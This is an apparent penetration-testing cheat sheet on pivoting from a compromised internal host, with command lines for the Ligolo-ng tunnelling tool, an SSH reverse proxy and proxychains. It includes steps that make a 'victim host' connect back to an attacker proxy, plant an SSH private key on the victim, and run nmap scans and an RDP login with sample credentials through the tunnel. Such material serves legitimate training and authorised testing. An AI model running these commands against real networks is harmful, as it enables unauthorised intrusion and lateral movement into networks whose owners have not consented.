Pivoting (Proxying)
How to pivot and proxy from an internal network
Method 1: Ligolo-ng
Ligolo is a simple and lightweight tool for establishing SOCKS5 or TCP tunnels from a reverse connection in complete safety (TLS certificate with elliptical curve).
1) To run the proxy on your victim host:
./ligolo.exe -connect <IP>:<PORT> -ignore-cert
2) To run the server on your attack host:
Start server
sudo ./proxy -selfcert -laddr 0.0.0.0:<port>
List session once established and see networks
sessionifconfig
Add a route into the network via ligolo TUN adapter
sudo ip route add <Your_local_IPrange>/24 dev ligolo
start tunnel on ligolo
tunnel_start
Method 2: SSH Reverse Proxy
SSH can natively perform pivoting. In the example below, we have three machines:
The SSH server
The attack host
The victim host (in an internal network)
On your SSH server, setup an SSH key:
ssh-keygen -C attacker@attacker
Add the generated public key to your SSH servers authorized keys list
/home/<user>/.ssh/authorized_keys
On your victim host, upload the generated private key and run the following command
ssh -i <SSHKey> -R 1037 -N <user>@<SSH_IP_Address>
On your attack host, make the reverse connection to the SSH server
ssh -i <sshkey> -L 8008:localhost:1037 -vN <user>@<SSH_IP_Address>Now you have a connection from your attack host to the victim host and network
Now proxy any tools through the SOCKS proxy you created at 127.0.0.1:8008.
or use proxychains.
Sending tools through a pivot (using Proxychains)
proxychains forces any TCP connection made by any given application to follow through a proxy
1) Setup Proxychains with an established SOCKS Pivot
nano
/etc/proxychains.confadd
socks4 127.0.0.1 9050
2) Execute tools using proxychains to route packets to local port 9050 and SSH forward to victim.
proxychains nmap -v -Pn -sT 172.16.5.19Only full TCP scans work, SYN scans send half packets that SOCKS doesn't like
proxychains xfreerdp /v:172.16.5.19 /u:victor /p:pass@123proxychains <yourtool>
Last updated